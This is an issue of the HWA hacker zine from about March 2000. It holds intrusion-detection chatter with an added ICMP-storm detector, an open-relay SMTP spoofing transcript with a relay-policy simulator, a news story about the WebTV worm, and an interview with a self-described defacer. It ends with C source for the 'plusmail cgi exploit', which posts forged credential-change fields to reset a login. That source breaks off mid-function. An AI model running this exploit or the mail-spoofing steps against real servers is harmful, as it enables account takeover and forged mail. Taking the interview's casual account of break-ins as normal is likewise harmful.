      Trojan Cow seems to be the winner in the number of hosts infected dept.
      if the # of different sources of the broadcasts and volume are any indication.
      
      Bottom line:
       
       Something is weird and new. We also had a runaway lynx process on one
      server.... now I hear there is a new remote overflow in it (Safer) - but that is
       just circumstantial evidence. That plus another potentially false outbound xterm
      trigger all leads to the old spidey senses saying...  fee fi fo fum... I smell
      hacking.    
      
      P.p.s.  for Max and the rules guys... outbound nmap TCP connect scans seem to
      false the "AOL chat data" rules in snort, not sure if that's in vision.conf or
      rapidnet set yet but I find this a useful falsing that lets me log outbound
      nmaps I initiate. :-)
      
      -- 
      dursec.com / kyx.net - we're from the future                      http://www.dursec.com
      learn kanga-foo from security experts: CanSecWest - April 10-12 Vancouver 
      
      Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
                RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, Max Vision/whitehats.com
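       Detection logic for the pattern Dragos describes, as an added example that is not
       part of his mail: it flags any source that bursts ICMP host-unreachables at a few
       repeated destinations and lists 10.11.* -> 10.11.* packets. The log lines are
       constructed in a simplified tcpdump style; the 10.11.0.0/16 range comes from the
       mail, while the addresses, threshold and window are assumptions.

```python
"""Flag an ICMP host-unreachable storm in packet-log lines.

Added example, not part of the original mail.  The log lines below are
constructed in a simplified tcpdump style to mimic the pattern described
in the mail: one 10.11.* source bursting host-unreachables at a few repeated
destinations, plus some 10.11.* -> 10.11.* traffic.  Addresses, threshold
and window are assumptions; the 10.11.0.0/16 range is from the mail.
"""
import re
from collections import Counter, defaultdict
from ipaddress import ip_address, ip_network

MODEM_NET = ip_network("10.11.0.0/16")   # where the mail says @home puts cablemodems

# Constructed sample: "<time> <src> > <dst>: <summary>"
SAMPLE_LOG = """\
23:40:01.10 10.11.42.7 > 207.230.246.170: icmp: host 172.16.6.195 unreachable
23:40:01.12 10.11.42.7 > 207.230.246.170: icmp: host 172.16.6.195 unreachable
23:40:01.15 10.11.42.7 > 207.230.246.253: icmp: host 172.16.6.195 unreachable
23:40:01.20 10.11.42.7 > 24.112.31.56: icmp: host 172.16.6.195 unreachable
23:40:01.22 10.11.42.7 > 207.230.246.170: icmp: host 172.16.6.195 unreachable
23:40:01.30 10.11.42.7 > 10.11.3.9: icmp: host 172.16.6.195 unreachable
23:40:02.01 10.11.42.7 > 207.230.246.253: icmp: host 172.16.6.195 unreachable
23:40:02.40 10.11.42.7 > 207.230.246.170: icmp: host 172.16.6.195 unreachable
23:40:05.00 10.11.7.3 > 10.11.7.255: udp 121
23:41:00.00 24.113.85.105 > 10.11.42.1: tcp 21 S
23:41:00.50 10.11.42.7 > 10.11.42.1: icmp: echo request
"""

PKT = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d(?:\.\d+)?) (?P<src>[\d.]+) > (?P<dst>[\d.]+): (?P<msg>.*)$")
UNREACH = re.compile(r"^icmp: host [\d.]+ unreachable$")


def parse_time(ts: str) -> float:
    """'HH:MM:SS.ff' -> seconds since midnight (enough for a same-day window)."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def find_storms(lines, threshold=5, window=10.0):
    """Sources that send at least `threshold` ICMP host-unreachables inside
    any `window`-second span.  Returns {src: {"burst", "total", "top_dst"}}."""
    per_src = defaultdict(list)                  # src -> [(t, dst), ...]
    for line in lines:
        m = PKT.match(line)
        if m and UNREACH.match(m["msg"]):
            per_src[m["src"]].append((parse_time(m["ts"]), m["dst"]))

    storms = {}
    for src, events in per_src.items():
        events.sort()
        burst, j = 0, 0
        for i in range(len(events)):              # sliding window over sorted times
            while events[i][0] - events[j][0] > window:
                j += 1
            burst = max(burst, i - j + 1)
        if burst >= threshold:
            storms[src] = {
                "burst": burst,
                "total": len(events),
                "top_dst": Counter(d for _, d in events).most_common(3),
            }
    return storms


def modem_to_modem(lines):
    """(src, dst) pairs with both ends inside MODEM_NET: the traffic the mail
    calls unusual to see on the client side of a cablemodem."""
    pairs = []
    for line in lines:
        m = PKT.match(line)
        if m and ip_address(m["src"]) in MODEM_NET and ip_address(m["dst"]) in MODEM_NET:
            pairs.append((m["src"], m["dst"]))
    return pairs


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for src, info in find_storms(lines).items():
        print(f"{src}: burst={info['burst']} total={info['total']} top={info['top_dst']}")
    print("modem-to-modem:", modem_to_modem(lines))
```

       The top destination list is what separates a flaky modem repeating the same
       few targets from a scan; the modem-to-modem list covers the 10.11 -> 10.11
       packets the mail says should not be visible on the client side at all.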
     
     -=-

     
     
     * From the Web board: *
     ~~~~~~~~~~~~~~~~~~~~~~~~
     
     (Didn't pull any from the board, check it out, some interesting
      stuff on there... - Ed)
     
     
     
     @HWA
      

 02.0 From the editor.
      ~~~~~~~~~~~~~~~~
      
                        _____    _ _ _             _
                       | ____|__| (_) |_ ___  _ __( )__
                       |  _| / _` | | __/ _ \| '__|/ __|
                       | |__| (_| | | || (_) | |   \__ \
                    ___|_____\__,_|_|\__\___/|_|   |___/
                   / ___|  ___   __ _ _ __ | |__   _____  __
                   \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ /
                    ___) | (_) | (_| | |_) | |_) | (_) >  <
                   |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\
                                     |_|

      

     #include <stdio.h>
     #include <thoughts.h>
     #include <backup.h>

     main()
         {
           printf ("Read commented source!\n\n");

         /* Another monthly release... oh well read on.
          * 
          *
          * Cruci
          *
          * cruciphux@dok.org
           * Preferred chat method: IRC Efnet in #HWA.hax0r.news
          *
          */
           
     printf ("EoF.\n");
           }
           
           
           
           
      Snailmail:
            
            HWA NEWS
	    P.O BOX 44118
	    370 MAIN ST. NORTH
	    BRAMPTON, ONTARIO
	    CANADA
	    L6V 4H5     
	    
	    
      Anonymous email:
      
      telnet (wingate ip) (see our proxies list)
      Wingate>0.0.0.0
      Trying 0.0.0.0...
      Connected to target.host.edu
      Escape character is '^]'.
      220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST)
      HELO bogus.com
      250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you
      MAIL FROM: admin@nasa.gov
      250 admin@nasa.gov... Sender ok
      RCPT TO: cruciphux@dok.org
      250 cruciphux@dok.org... Recipient ok
      DATA
      Secret cool infoz
      .
      QUIT
      
      If you got that far everything is probably ok, otherwise you might see
      550 cruciphux@dok.org... Relaying denied
      
      or
      
      550 admin@nasa.gov... Domain must exist
            
      etc.
      
      
      
       * This won't work on a server with up to date rule sets denying relaying and your
         attempts will be logged so we don't suggest you actually use this method to
         reach us, it's probably also illegal (theft of service) so, don't do it. ;-)
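       The server-side relay decision behind the session above, as an added example (not
       the zine's or sendmail's code): serve() replays the client's command lines and returns
       the replies the server would give, so the open-relay setting (every recipient
       accepted) sits beside the default that answers "Relaying denied". The host name
       target.host.edu is from the transcript; the trusted network 192.0.2.0/24, the proxy
       address 198.51.100.7 and the resolvable-domain set are constructed assumptions.

```python
"""Server-side relay policy behind the SMTP session above.

Added example, not the zine's or sendmail's code.  serve() replays client
command lines and returns the reply the server would give, so the open-relay
setting (promiscuous_relay=True, every recipient accepted) can be compared
with the default that answers "Relaying denied".  Host name is from the
transcript; networks, client address and the resolvable-domain set are
constructed assumptions.
"""
import re
from ipaddress import ip_address, ip_network

HOST = "target.host.edu"                       # server name from the transcript
LOCAL_DOMAINS = {"target.host.edu"}            # assumption: domains delivered locally
RELAY_NETS = [ip_network("192.0.2.0/24")]      # assumption: our own clients, may relay out
RESOLVABLE = {"nasa.gov", "dok.org", "target.host.edu"}   # stand-in for a DNS lookup
ADDR = re.compile(r"<?([^<>\s]+@[^<>\s]+)>?")   # pulls the address out of MAIL/RCPT args


def domain_of(addr: str) -> str:
    return addr.rsplit("@", 1)[-1].lower()


def sender_reply(mail_from: str) -> str:
    """sendmail-style check that the envelope sender's domain resolves."""
    if domain_of(mail_from) not in RESOLVABLE:
        return f"550 {mail_from}... Domain must exist"
    return f"250 {mail_from}... Sender ok"


def recipient_reply(client_ip: str, rcpt_to: str, promiscuous_relay: bool) -> str:
    """Accept local recipients, and remote ones only for trusted clients
    (or for everyone when the relay is left promiscuous: the open-relay case)."""
    local = domain_of(rcpt_to) in LOCAL_DOMAINS
    trusted = any(ip_address(client_ip) in net for net in RELAY_NETS)
    if local or trusted or promiscuous_relay:
        return f"250 {rcpt_to}... Recipient ok"
    return f"550 {rcpt_to}... Relaying denied"


def serve(client_ip: str, commands, promiscuous_relay: bool = False):
    """Return the banner followed by one reply per client command
    (body lines between DATA and '.' get none)."""
    replies = [f"220 {HOST} ESMTP (constructed example)"]
    sender, rcpts, in_data = None, 0, False
    for line in commands:
        if in_data:
            if line == ".":
                in_data = False
                replies.append("250 Message accepted for delivery")
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        m = ADDR.search(arg)
        if verb in ("HELO", "EHLO"):
            replies.append(f"250 {HOST} Hello [{client_ip}], pleased to meet you")
        elif verb == "MAIL":
            if not m:
                replies.append("501 Syntax error in parameters")
                continue
            reply = sender_reply(m.group(1))
            sender = m.group(1) if reply.startswith("250") else None
            replies.append(reply)
        elif verb == "RCPT":
            if sender is None:                  # a rejected MAIL FROM leaves no sender
                replies.append("503 Need MAIL command")
            elif not m:
                replies.append("501 Syntax error in parameters")
            else:
                reply = recipient_reply(client_ip, m.group(1), promiscuous_relay)
                if reply.startswith("250"):
                    rcpts += 1
                replies.append(reply)
        elif verb == "DATA":
            if rcpts == 0:                      # nothing accepted, so no message body
                replies.append("503 Need RCPT (recipient)")
            else:
                in_data = True
                replies.append('354 Enter mail, end with "." on a line by itself')
        elif verb == "QUIT":
            replies.append(f"221 {HOST} closing connection")
        else:
            replies.append("500 Command unrecognized")
    return replies


# The client side of the session shown above, arriving from a constructed
# proxy address that is outside every trusted network.
TRANSCRIPT = ["HELO bogus.com", "MAIL FROM: admin@nasa.gov",
              "RCPT TO: cruciphux@dok.org", "DATA", "Secret cool infoz", ".", "QUIT"]
PROXY_IP = "198.51.100.7"

if __name__ == "__main__":
    for setting in (True, False):
        print(f"promiscuous_relay={setting}")
        for reply in serve(PROXY_IP, TRANSCRIPT, promiscuous_relay=setting):
            print("  ", reply)
```

       With the relay closed, the message body that follows the rejected DATA is
       parsed as commands and answered with 500s, which is also what ends up in the
       server's log.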
        
      -=-     

      

      Congrats, thanks, articles, news submissions and kudos to us at the
         
      main address: cruciphux@dok.org complaints and all nastygrams and
         
      mailbombs can go to /dev/nul nukes, synfloods, trinoo and tribe
      or ol' papasmurfs to  127.0.0.1, 
      
      private mail to cruciphux@dok.org

     danke.

     C*:.
     
     -= start =--= start =--= start =--= start =--= start =--= start =--= start 
   
     
                       ____            _             _
                      / ___|___  _ __ | |_ ___ _ __ | |_
                     | |   / _ \| '_ \| __/ _ \ '_ \| __|
                     | |__| (_) | | | | ||  __/ | | | |_
                      \____\___/|_| |_|\__\___|_| |_|\__|
                           / ___|| |_ __ _ _ __| |_
                           \___ \| __/ _` | '__| __|
                            ___) | || (_| | |  | |_
                           |____/ \__\__,_|_|   \__|

             
     
                            
      -= start =--= start =--= start =--= start =--= start =--= start =--= 
      
      
      
     
03.0 Clearing up a nasty screw up in issue #51, here's what happened...
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     I fucked up. Two 'versions' of #51 were actually released, a few early birds
     got the "bad" copy. The 'real' copy has (2) in the upper left very top corner.
     
     Collectors edition!
     
     :-)
     
     Details? nah you wouldn't be interested anyways....
     
     -=-
     
     @HWA
     
     
04.0 HACK.CO.ZA AND A PLEA FOR HOSTING, +LOST EMAIL!
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     NOTE:
     
     I had a gracious offer from *someone* the last time HACK.CO.ZA needed
     hosting, but unfortunately my mailbox had corrupted and I lost this
     message before I could forward it to the site owner Gov-Boi. If after
     reading this you can still offer services, please send another email
     to me at cruciphux@dok.org... thanks!
     
          
     @HWA
     

05.0 WebTV hit by "Melissa-Type" virus
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contributed by: Merxenary
     Source: C|Net

     http://news.cnet.com/news/0-1006-200-1576095.html?tag=st.ne.1002.


     WebTV hit by Melissa-like bug 
     By Stephanie Miles
     Staff Writer, CNET News.com
     March 17, 2000, 3:55 p.m. PT 

     WebTV has been hit by a self-replicating bug that is wreaking havoc 
     with the network's message boards and newsgroups, a situation that 
     knocks back the company's claim that it is immune to viruses and 
     security holes. 

     The problem, which some are calling the "Flood Virus," gets inside
     the e-mail system of WebTV owners and prompts the WebTV set-top box
     to litter bulletin board and newsgroup sites on the company's 
     network with redundant junk mail. Like the Melissa virus, the 
     malicious WebTV code sends out the emails under a user's name 
     without their knowledge. 

     Melissa-type viruses cause damage by clogging email servers of 
     corporations and organizations with illegitimate emails. For 
     WebTV users, the chief problem so far has come in trying to read
     the intra-network web sites. Bulletin boards on the WebTV network
     only show five postings at a time. An outbreak of the Flood Virus
     therefore makes it very difficult for users to find relevant 
     messages on the board. 

     Subscribers also face potential embarrassment, as emails under 
     their name are posted to newsgroups without their knowledge. 

     Microsoft, which owns WebTV, has confirmed the existence of the
     problem but claims the situation is a hack rather than a virus.
     The company added that the problem is not widespread. 

     Whatever the root cause of the problem, the situation is a black eye
     for the service. One of WebTV's marketing pitches has been that 
     subscribers do not have to worry about rogue viruses on the Internet. 

     Microsoft also has had a tempestuous relationship with segments of
     its subscriber base over technological issues in the past. After 
     gaining attention as the first firm to offer Internet service through
     the television, WebTV has struggled to build its subscriber base and 
     has encountered criticism from users for failing to support standard 
     Web technologies such as Java. The company was acquired by Microsoft
     in 1997. 

     WebTV was recently forced to reverse course and remove banner ads 
     from emails viewed and stored on the site in response to a flood of
     customer complaints. The backlash comes as WebTV faces a looming 
     challenge from Internet service giant America Online, which is set
     to launch its AOL TV sometime this summer. 

     The problem was first discovered by Net4TV, which tracks interactive
     television. Net4TV came up with the Flood Virus name. 

     "It's absolutely self-replicating. It inserts the virus code into the
     signature upon opening the email or going to the newsgroup," said 
     Brian Bock, editor in chief at Net4TV. 

     The general public does not have to worry about the flaw. It can only
     come in e-mails from WebTV units and it only affects other WebTV boxes.
     In addition, all of the excess mail is currently being directed at 
     newsgroups and bulletin boards on the company's network. 

     The WebTV network is written mainly in HTML, and the company uses HTML
     shortcuts for certain network features, according to Net4TV. Shortcuts
     within users' email signature files, the calling card at the bottom of
     an e-mail message, serve as the entryway for the malicious code. The 
     code manipulates the signature file and then prompts the Web TV unit 
     to post repeatedly to WebTV newsgroups. 

     WebTV representatives could not confirm this account of how the network
     is set up. Nonetheless, they acknowledged it exists. 

     "It's a fundamental flaw in the WebTV architecture," Bock said. 

     Although WebTV currently counts about one million subscribers, Microsoft
     is marketing portions of the service along with its TV Pak to cable 
     service providers as Microsoft TV. If portions of the WebTV browser are
     easily susceptible to these types of attacks, Bock said, it does not bode
     well for Microsoft TV if it is installed on a widespread basis through 
     cable providers. 

     "It points to a larger problem," he said, calling for an independent 
     security analysis of the WebTV architecture, similar to that which took
     place with Microsoft's Hotmail free email service after suffering repeated
     privacy breaches. "It points to what else may be going on under there." 

     For its part, WebTV says the problem has only hit a very small number of
     WebTV Classic users. According to Microsoft, hackers combined two known 
     WebTV hacks: one which inserts malicious code into the user's email 
     signature file, and one which inserts malicious code into postings on 
     the newsgroup itself. 

     "These two codes were linked together," a spokesperson said, asserting 
     that only 14 of the 594,000 WebTV Classic users have reported being 
     infected with the bug. WebTV had previously created fixes for the two
     separate problems when they originally surfaced. The company is working
     on a more comprehensive patch to be released next week. 

     In the meantime, users should open their signature file to check if any
     new text or code has been inserted, the WebTV representative said. 
   
     @HWA
     
          
     
06.0 BlaznWeed interview, background info, and Sect0r    
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     By Cruciphux
     
     BlaznWeed contacted me regarding commenting on some of the things Sect0r said
     in the interview last issue, so we address those and get a general interview
     as well... mildly edited to remove general chatter. - Ed
     
     
     
     Interview date: Sun Mar 19/2000
     By: Cruciphux
     
     Session Start: Sun Mar 19 15:26:53 2000
     [15:26] Session Ident: BlaznWeed (some1@*.*.*.uk)
     [15:26] <BlaznWeed> i'm ready
     [15:27] <Cruciphux> ok hi.. sorry to keep ya waiting
     [15:27] <BlaznWeed> np
     [15:27] <Cruciphux> i'm pretty informal, no real structure 
     [15:28] <BlaznWeed> thats fine by me
     [15:28] <Cruciphux> i'll do the preliminary intro questions ...
     [15:28] <Cruciphux> like age interest group affiliations etc
     [15:28] <BlaznWeed> i'm 20 and my group is wkD     
     [15:29] <Cruciphux> whats wkD stand for?
     [15:29] <Cruciphux> and how long has it been around?
     [15:29] <BlaznWeed> wicked
     [15:29] <Cruciphux> how many members and where are they based?
     [15:29] <Cruciphux> how did you meet? irc?
     [15:29] <Cruciphux> :
     [15:29] <BlaznWeed> there are many members
     [15:30] <BlaznWeed> and i don't know them all
     [15:30] <Cruciphux> some in other groups too?
     [15:30] <BlaznWeed> I got introduced to wkD by zeroc
     [15:30] <BlaznWeed> who is the founder
     [15:30] <BlaznWeed> I don't think so
     [15:30] <BlaznWeed> but i can't say for sure
     [15:30] <BlaznWeed> he hangs on dalnet mostly
     [15:31] <Cruciphux> you too?
     [15:31] <BlaznWeed> yeah
     [15:31] <Cruciphux> why dalnet? any reason?
     [15:31] <BlaznWeed> Most of my friends are on dalnet
     [15:31] <Cruciphux> how long have you been on the net?
     [15:32] <BlaznWeed> about three four years
     [15:32] <BlaznWeed> to
     [15:32] <Cruciphux> how long have you been into computers? same time or 
                         longer?
     [15:32] <BlaznWeed> the nets is relatively new here in the uk
     [15:32] <BlaznWeed> longer
     [15:32] <BlaznWeed> about six maybe 7
     [15:33] <Cruciphux> how would you classify yourself? ie: hacker cracker
                         coder scriptkid <sic>
     [15:33] <Cruciphux> and do you code? if so in what?
     [15:33] <BlaznWeed> hehe 
     [15:33] <BlaznWeed> yes i do code
     [15:34] <BlaznWeed> but i haven't written my own exploits yet
     [15:34] <Cruciphux> oh I forgot 'defacer'
     [15:34] <Cruciphux> :)     
     [15:34] <BlaznWeed> i'm a full time computer science student
     [15:34] <BlaznWeed> i suppose i'd be labeled a cracker
     [15:34] <Cruciphux> so you break into sites but don't deface all of them?
     [15:35] <BlaznWeed> If i manage to break into a unix box i don't deface 
                         them
     [15:35] <Cruciphux> about how many have you done? 
     [15:35] <BlaznWeed> simply because i have other uses for them
     [15:35] <Cruciphux> and how long have you been doing it?
     [15:35] <BlaznWeed> but the N boxes i have no use for
     [15:35] <Cruciphux> nod
     [15:36] <BlaznWeed> maybe a couple of years now
     [15:36] <BlaznWeed> i started off hacking nothing but unix boxes
     [15:36] <Cruciphux> what is your home machine? if more than one box whats 
                         your setup?
     [15:36] <BlaznWeed> I actually enjoy playing hide and seek with admins
     [15:36] <Cruciphux> heh
     [15:36] <Cruciphux> battle of wits
     [15:37] <BlaznWeed> I'm just running linux at home 
     [15:37] <BlaznWeed> but i used to run solaris
     [15:37] <BlaznWeed> but the thing with solaris is that it doesn't run very 
                         well on x86 processors
     [15:38] <BlaznWeed> so i'm stuck with linux until i can afford a sparc
     [15:38] <Cruciphux> I don't like solaris 
     [15:38] <BlaznWeed> solaris and linux are like blondes and brunettes i like
                         em both
     [15:38] <BlaznWeed> :D
     [15:38] <Cruciphux> and its worse on x86 processors
     [15:39] <Cruciphux> what about *BSD?
     [15:39] <Cruciphux> its closer to real unix than linux*
     [15:39] <BlaznWeed> I haven't tried that
     [15:39] <BlaznWeed> though  i do have a couple of bsd shells
     [15:39] <BlaznWeed> legit ones mind
     [15:40] <Cruciphux> without giving details outline a typical hack, ie: what
                         do you use as a base point, do you use pbx or redirectors
                         to dial into hacked accts etc, what country do you use etc
     [15:40] <BlaznWeed> yeah i notice
     [15:41] <BlaznWeed> no comment
     [15:41] <Cruciphux> hehe
     [15:41] <Cruciphux> damn that was the most interesting too
     [15:41] <Cruciphux> :)
     [15:41] <BlaznWeed> :)
     [15:43] <BlaznWeed> well i suppose this interview gives me the perfect 
                         opportunity to address some of the misleading comments
                         written by sect0r in the last issue of hwa     
     [15:43] <Cruciphux> I was about to approach that
     [15:43] <Cruciphux> initially sect0r said he and you were 'ok' after the 
                         defacement log incident
     [15:44] <BlaznWeed> yeah i thought we were ok too
     [15:44] <BlaznWeed> "He" claims i'm a wannabe with no skills,
     [15:44] <BlaznWeed> this is funny since it was only the other day he asked me
     [15:44] <BlaznWeed> to deface a web site for him
     [15:45] <Cruciphux> hrm
     [15:45] <BlaznWeed> "He" claims he could have redefaced my stuff easily
     [15:45] <BlaznWeed> this is funny again since he had to come and ask me to do
                         his chores.
     [15:45] <Cruciphux> yeah in the interview he said     
     [15:45] <Cruciphux> [20:03] <sect> i had someone akicked from #hackers on dalnet, 
     [15:45] <Cruciphux>                the kid retaliated, what can i say?
     [15:45] <BlaznWeed> And even if he did know how to redeface my stuff he wouldn't 
                         have gotten
     [15:45] <BlaznWeed> very far since I patched all the box's I hacked.
     [15:45] <Cruciphux> [20:04] <sect> that would be blazinweed, he is basically a 
     [15:45] <Cruciphux>                wannabe with no skills to speak of.     
     [15:45] <Cruciphux> [20:04] <sect> i would have re-defaced his stuff easily 
     [15:45] <Cruciphux>                (nt boxen), but i'm not down with that 
                                        anymore.
     [15:45] <Cruciphux> ...
     [15:45] <BlaznWeed> He also highlights the fact
     [15:45] <BlaznWeed> that they were only NT boxes that were defaced well
                         i'd like to respond to this by saying i only deface 
                         NT boxes because i have no use for them but the unix
                         boxes I keep btw he runs windows :D
     [15:45] <Cruciphux> good point
     [15:46] <BlaznWeed> I'd also like to say a few things about the plusmail 
                         exploit
     [15:46] <BlaznWeed> that he and ytcracker talked about. I've never heard
                         so much bull ever.
     [15:46] <BlaznWeed> the Hole was found by Herf (of wkD which is my group
                         also) 
     [15:46] <Cruciphux> but people take notice of defacements because they 
                         are 'public' and summarily judge people in the 'scene'
                         by their web 'hacks'
     [15:46] <BlaznWeed> and all it required was a simple html file that you 
                         loaded in your browser
     [15:46] <BlaznWeed> which then allowed you to bypass the login screen on 
                         dumb servers running plusmail.btw the scanner was 
                         written by ytcracker and it was useless anyway since
                         next to no servers run the vulnerable package and the
                         ones that do have long since patched it.
     [15:47] <BlaznWeed> This is the reason you didn't see it get a slot at 
                         securityfocus.
     [15:47] <Cruciphux> * plusmail cgi exploit 
     [15:47] <Cruciphux>    - missnglnk 
     [15:47] <Cruciphux>    greets: herf, ytcracker, mosthated, tino
     [15:47] <Cruciphux> that one? or a variant
     [15:47] <BlaznWeed> variant
     [15:47] <Cruciphux> ok
     [15:47] <Cruciphux> thats on packetstorm btw
     [15:47] <BlaznWeed> I was one of the first people to have it
     [15:48] <Cruciphux> http://packetstorm.securify.com/0001-exploits/plusmail.c
     [15:48] <BlaznWeed> hrm
     [15:49] <Cruciphux> have you confronted sect0r about his comments?
     [15:49] <Cruciphux> if so what happened
     [15:49] <Cruciphux> if not why not
     [15:49] <Cruciphux> :)
     [15:49] <BlaznWeed> he left before i could
     [15:50] <BlaznWeed> someone found all his personal info
     [15:50] <Cruciphux> nod I'm aware of that
     [15:50] <BlaznWeed> and he is gone to hide
     [15:52] <Cruciphux> anything else you'd like to say? there isn't that much we 
                         haven't covered really
     [15:53] <Cruciphux> we don't need to drag it out
     [15:53] <Cruciphux> :)
     [15:53] <BlaznWeed> :D
     [15:53] <BlaznWeed> I think i've readdressed the balance
     [15:53] <Cruciphux> do you guys have a site for instance?
     [15:53] <Cruciphux> website that is
     [15:53] <BlaznWeed> yeah but its private
     [15:54] <Cruciphux> if you think of anything to add lemme know
     [15:54] <BlaznWeed> ok
     [15:54] <Cruciphux> my email is cruciphux@dok.org
     [15:54] <BlaznWeed> thanks
     [15:54] <Cruciphux> if i'm not online
     [15:54] <Cruciphux> tnx
     [15:54] <Cruciphux> -end-
     Session Close: Sun Mar 19 15:55:19 2000
     
     @HWA
     
     
07.0  plusmail cgi exploit
      ~~~~~~~~~~~~~~~~~~~~
       /*
        * plusmail cgi exploit 
          - missnglnk 
          greets: herf, ytcracker, mosthated, tino
        *
        * POSTs a username/password/password1/new_login form to
        * /cgi-bin/plusmail on the target, then serves the page the CGI sends
        * back (with its <form action> rewritten to an absolute URL on the
        * target) on a local port so it can be opened in a browser.
        */
       
       #include <stdio.h>
       #include <stdlib.h>
       #include <stdarg.h>
       #include <string.h>
       #include <errno.h>
       #include <unistd.h>
       #include <sys/stat.h>
       #include <sys/types.h>
       #include <fcntl.h>
       #include <sys/socket.h>
       #include <netdb.h>
       #include <netinet/in.h>
       #include <arpa/inet.h>
       #include <sys/param.h>
       
       static void
       usage(const char *prog)
       {
               printf("plusmail cgi exploit by missnglnk\n");
               printf("%s [-h hostname/ip ] [-p target port] [-u username] [-n newpassword] [-l optional local port]\n", prog);
       }
       
       /*
        * Append formatted text to buf without ever running past bufsz and
        * return the new number of bytes in use. (The original built the page
        * with snprintf(buf, ..., "%s...", buf), which overlaps source and
        * destination and is undefined behaviour; it also never zeroed buf.)
        */
       static size_t
       append(char *buf, size_t bufsz, size_t used, const char *fmt, ...)
       {
               va_list         ap;
               int             r;
       
               if (used >= bufsz - 1)
                       return used;
               va_start(ap, fmt);
               r = vsnprintf(buf + used, bufsz - used, fmt, ap);
               va_end(ap);
               if (r < 0)
                       return used;
               if ((size_t) r >= bufsz - used)
                       return bufsz - 1;       /* truncated: buffer is full */
               return used + (size_t) r;
       }
       
       int
       main(int argc, char **argv)
       {
               int             argswitch, tport = 80, sockfd, clntfd, plen, lport = 4040, first = 1;
               socklen_t       cltlen;
               ssize_t         n;
               size_t          used = 0;
               char           *target = NULL, tmpdata[32768], *password = "default",
                              *username = "jackdidntsetone", pdata[1024],
                              *tmpline, *firstline, origdata[32768], htmldata[32768];
               struct sockaddr_in rmt, srv, clt;
               struct hostent *he;
       
               if (argc < 5) {
                       usage(argv[0]);
                       return -1;
               }
       
               while ((argswitch = getopt(argc, argv, "h:p:u:n:l:v")) != -1) {
                       switch (argswitch) {
                       case 'h':
                               if (strlen(optarg) > MAXHOSTNAMELEN) {
                                       printf("ERROR: Target hostname too long.\n");
                                       return -1;
                               }
                               target = optarg;
                               break;
       
                       case 'p':
                               tport = atoi(optarg);
                               break;
       
                       case 'n':
                               /* the original caps both fields at 8 characters */
                               if (strlen(optarg) > 8) {
                                       printf("Password length greater than 8 characters.\n");
                                       return -1;
                               }
                               password = optarg;
                               break;
       
                       case 'u':
                               if (strlen(optarg) > 8) {
                                       printf("Username length greater than 8 characters.\n");
                                       return -1;
                               }
                               username = optarg;
                               break;
       
                       case 'l':
                               lport = atoi(optarg);
                               break;
       
                       case '?':
                       default:
                               usage(argv[0]);
                               return -1;
                       }
               }
       
               argc -= optind;
               argv += optind;
       
               if (target == NULL) {
                       printf("ERROR: -h target is required.\n");
                       return -1;
               }
       
               memset(&rmt, 0, sizeof(rmt));
               memset(&srv, 0, sizeof(srv));
               memset(&clt, 0, sizeof(clt));
               memset(tmpdata, 0, sizeof(tmpdata));
               memset(htmldata, 0, sizeof(htmldata));
               cltlen = sizeof(clt);
       
               /* gethostbyname() resolves dotted quads too; inet_aton() is the fallback */
               if ((he = gethostbyname(target)) != NULL) {
                       memcpy(&rmt.sin_addr, he->h_addr_list[0], sizeof(rmt.sin_addr));
               } else if (inet_aton(target, &rmt.sin_addr) == 0) {
                       fprintf(stderr, "Error resolving target %s\n", target);
                       return -1;
               }
       
               rmt.sin_family = AF_INET;
               rmt.sin_port = htons(tport);
       
               srv.sin_family = AF_INET;
               srv.sin_addr.s_addr = INADDR_ANY;
               srv.sin_port = htons(lport);
       
               if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                       perror("Error creating socket");
                       return -1;
               }
       
               if (connect(sockfd, (struct sockaddr *) & rmt, sizeof(rmt)) < 0) {
                       perror("Error connecting");
                       return -1;
               }
       
               /* the form fields plusmail reads for a credential change */
               snprintf(pdata, sizeof(pdata), "username=%s&password=%s&password1=%s&new_login=missnglnk", username, password, password);
               plen = strlen(pdata);
       
               snprintf(tmpdata, sizeof(tmpdata), "POST /cgi-bin/plusmail HTTP/1.0\n" \
                        "Referer: http://www.pure-security.net\n" \
                        "User-Agent: Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)\n" \
                        "Host: %s\n" \
                        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\n" \
                        "Accept-Encoding: gzip\n" \
                        "Accept-Language: en\n" \
                        "Accept-Charset: isp-8859-1,*,utf-8\n" \
                        "Content-type: application/x-www-form-urlencoded\n" \
                        "Content-length: %d\n" \
                        "\n%s\n", target, plen, pdata);
       
               if (write(sockfd, tmpdata, strlen(tmpdata)) < (ssize_t) strlen(tmpdata)) {
                       perror("Error writing data");
                       return -1;
               }
       
               /*
                * Collect the whole reply. Every chunk is NUL-terminated before a
                * string function touches it, and because strtok() is destructive the
                * chunk is copied before the status line is pulled out of it.
                */
               while ((n = read(sockfd, tmpdata, sizeof(tmpdata) - 1)) > 0) {
                       tmpdata[n] = '\0';
                       memcpy(origdata, tmpdata, (size_t) n + 1);
       
                       /* only the first chunk begins with the HTTP status line */
                       if (first) {
                               first = 0;
                               firstline = strtok(tmpdata, "\n");
                               if (firstline != NULL && strstr(firstline, "404") != NULL) {
                                       printf("plusmail.cgi aint here buddy.\n");
                                       return -1;
                               }
                       }
       
                       /* rewrite the form action so the saved page posts back to the target */
